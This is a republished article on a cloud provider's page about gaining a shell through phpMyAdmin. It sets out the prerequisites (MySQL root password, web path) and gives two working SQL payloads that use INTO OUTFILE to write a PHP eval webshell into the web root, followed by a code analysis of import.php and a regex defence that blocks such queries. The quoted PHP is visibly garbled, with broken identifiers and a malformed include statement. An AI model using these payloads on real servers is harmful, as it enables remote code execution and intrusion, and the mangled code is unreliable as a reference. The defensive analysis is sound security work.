Getshell Via phpmyadmin SQL execution to Write Evil Webshell File into Disk

Source: Internet
Author: User
Tags goto phpmyadmin

Directory

1 . Vulnerability Description 2 . Vulnerability trigger Condition 3 . Vulnerability Impact Range 4 . Vulnerability Code Analysis 5 . Defense Methods 6. Defensive thinking

1. Vulnerability description

PhpMyAdmin is a PHP-based, web-base-style MySQL database management tool that is architected on a Web site host, allowing administrators to manage the MySQL database using a Web interface. This web interface can be an easy way to enter complex SQL syntax, especially to handle the import and export of large amounts of data. One of the bigger advantages is that because phpMyAdmin is executed on the Web server like any other PHP program, you can use the HTML pages generated by these programs anywhere, that is, to manage the MySQL database remotely, to easily create, modify, and delete databases and data tables. It is also possible to build common PHP syntax by phpMyAdmin, which is convenient for writing web pages with the correct SQL syntax


2. Vulnerability Trigger Condition

1 . Known phpmyadmin root password, which is the root password for MySQL (phpMyAdmin is just a web-based tool to    Connect to MySQL) 1 MySQL itself default    weak password 2) through other vulnerabilities (such as injection) to obtain the root password of MySQL 2. The physical path    of a known web site 1) in the background of the phpMyAdmin " variable "tab page, you can see the physical path of MySQL, so as to infer the physical path    of the site  2) Obtain the physical path of the Web site through other web vulnerabilities

The core of Getshell through phpMyAdmin is the operation of file write through SQL, the common SQL is as follows

----1---Create TABLE A (cmd text not NULL), Insert into a (cmd) VALUES ('<?php @eval ($_post[cmd])?>');SelectCmd fromA into outfile'c:/htdocs/1.php'; Drop table if EXISTS a;drop table if EXISTS ' a ';----1-------2---Select '<?php @eval ($_post[pass]);? >'Into OUTFILE'd:/wamp/www/exehack.php'----2---

Relevant Link:

http://www.exehack.net/681.htmlhttp://www.exehack.net/99.htmlhttp://  www.187299.com/archives/1695


3. Vulnerability Impact Range

All phpMyAdmin versions


4. Vulnerability Code Analysis

/phpmyadmin/import.php

All logic that handles user-defined SQL parsing execution is implemented in this PHP file

/*This code point is Important$import_text is the one, need to be check Strictly*/if($go _sql) {//Parse SQL queryInclude_once'libraries/parse_analyze.inc.php'; if(Isset ($ajax _reload) && $ajax _reload['Reload'] ===true) {$response=pma_response::getinstance (); $response->addjson ('Ajax_reload', $ajax _reload); } pma_executequeryandsendqueryresponse ($analyzed _sql_results,false, $db, $table,NULL, $import _text,NULL, $analyzed _sql_results['is_affected'],NULL,        NULL,NULL,NULL, $Goto, $pmaThemeImage,NULL,NULL,NULL, $sql _query,NULL,NULL    );} Else if($result) {//Save a bookmark with more than one queries (if Bookmark label given).    if(! empty ($_post['Bkm_label']) &&!empty ($import _text)) {Pma_storethequeryasbookmark ($db, $GLOBALS ['CFG']['Bookmark']['User'], $import _text, $_post['Bkm_label'], isset ($_post['Bkm_replace']) ? $_post['Bkm_replace'] :NULL        ); } $response=pma_response::getinstance (); $response->issuccess (true); $response->addjson ('message', Pma_message::success ($msg)); $response-Addjson ('Sql_query', Pma_util::getmessage ($msg, $sql _query,'Success')    );} Else if($result = =false) {$response=pma_response::getinstance (); $response->issuccess (false); $response->addjson ('message', Pma_message::error ($msg));} Else{$active _page= $Goto; Include"'. $Goto;}


5. Defense Methods

Malicious checking of variable $import_text is our defense of Getshell attack against phpMyAdmin executing SQL export File

if (Preg_match ("/select.*into.*outfile/i", $import _text, $matches)) {      "request error! " " </br> " . $matches [0];    Die ();}

6. Defensive Thinking

Copyright (c) Littlehann All rights reserved

Getshell Via phpmyadmin SQL execution to Write Evil Webshell File into Disk

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.